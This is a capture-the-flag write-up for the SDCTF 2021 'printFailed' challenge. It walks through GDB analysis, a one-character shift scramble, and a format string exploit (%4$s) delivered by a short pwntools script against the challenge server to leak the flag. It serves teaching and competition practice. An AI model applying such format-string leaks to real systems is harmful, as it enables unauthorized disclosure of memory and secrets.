Sdctf 2021
printFailed
Solved By : thewhiteh4t
- Right from the start we get a segfault on this binary
./printFailed
zsh: segmentation fault (core dumped) ./printFailed
- Let’s investigate in GDB
- It’s trying to open flag.txt but it does not exist, I created the file and relaunched the binary and it works now
./printFailed
can you guess the scrambled flag?
yes
you guessed:
yes
wrong
- It prints the input, let’s look into GDB again
- A scramble function is called soon after the file is read
- Here we can see the scrambled flag :
"tedug|g5l4`gm5h~\v", '\001' <repeats 22 times>
- this looks familiar
tedug|g5l4`gm5h~\v
sdctf{f4k3_fl4g}
- so the input is shifted by 1 character!
- let’s try to input the scrambled flag in the local binary
#!/usr/bin/env python3
from pwn import *
elf = ELF('./printFailed')
guess = b'tedug|g5l4`gm5h~\v' + b'\001' * 22
p = elf.process()
p.send(guess)
out = p.recv(4096)
print(out)
- the scrambled flag works!
- but now the issue is that we don’t know the actual flag so we cannot make a scrambled flag
- earlier we saw that the binary prints the input, this hints at
format string exploit - this article helped a lot in figuring out the way forward
- https://nikhilh20.medium.com/format-string-exploit-ccefad8fd66b
- https://man7.org/linux/man-pages/man3/printf.3.html
%s -> string
%2$s -> 2nd argument
%3$s -> 3rd argument
- I tried them one by one and
%4$sleaks the scrambled flag!
- Here is the final script and output :
#!/usr/bin/env python3
from pwn import *
host = 'printf.sdc.tf'
port = 1337
payload = b'%4$s'
conn = remote(host, port)
conn.send(payload + b'\n')
res = conn.recv(4096).decode().split('\n')[2]
conn.close()
print(res)
for char in res:
print(chr(ord(char) - 1), end='')
OUTPUT :
